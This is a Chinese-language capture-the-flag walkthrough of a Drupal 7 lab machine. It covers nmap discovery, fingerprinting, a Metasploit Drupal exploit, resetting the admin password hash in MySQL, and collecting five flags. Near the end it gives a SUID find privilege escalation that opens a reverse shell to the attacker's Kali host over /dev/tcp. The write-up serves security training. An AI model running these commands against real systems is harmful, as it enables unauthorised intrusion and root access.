靶机环境

网段:192.168.26.0/24
kali:192.168.26.128
网关: 192.168.26.2

找出靶机的ip

nmap -sP 192.168.26.0/24

image-20240311152142829

靶机:192.168.26.129

端口探测

image-20240311153016110

信息收集

先扫一下目录:

python3 dirsearch.py -u http://192.168.26.129

貌似没有有用的文件。

网站指纹识别

whatweb -v 192.168.26.129

image-20240311155719932

可以看到CMS为Drupal,version为7

去找相关的漏洞。 这里使用msf进行验证

image-20240311170921156

这里使用这个漏洞进行攻击, image-20240311171013663

哑shell变交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

第一个flag

image-20240311171109735

提示我们配置文件

第二个flag

image-20240311171331583

并且这里得到了数据库的用户名和密码,登录mysql

image-20240311171622958

image-20240311172903933

可以看到这里的密码应该是被加密了,

Drupal框架中有一个生成加密后密码的脚本,我们设置密码为123456789 然后将admin的密码给替换即可

分享:忘记Drupal的管理员密码的解决办法 | Drupal China

php scripts/password-hash.sh 123456789

image-20240311173715358

替换admin的密码:

image-20240311174142987

image-20240311174233524

登录进去了

第三个flag

image-20240311174512484

第四个flag

直接查找一下

find / -name flag4*

image-20240311175128099

没有权限

提权

image-20240311175659431

可以看到find有s权位,可以提权,反弹shell

find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.26.128/9919 0>&1 \;

image-20240311181223889

第五个flag

在root目录下,root权限直接查看:

image-20240311181302485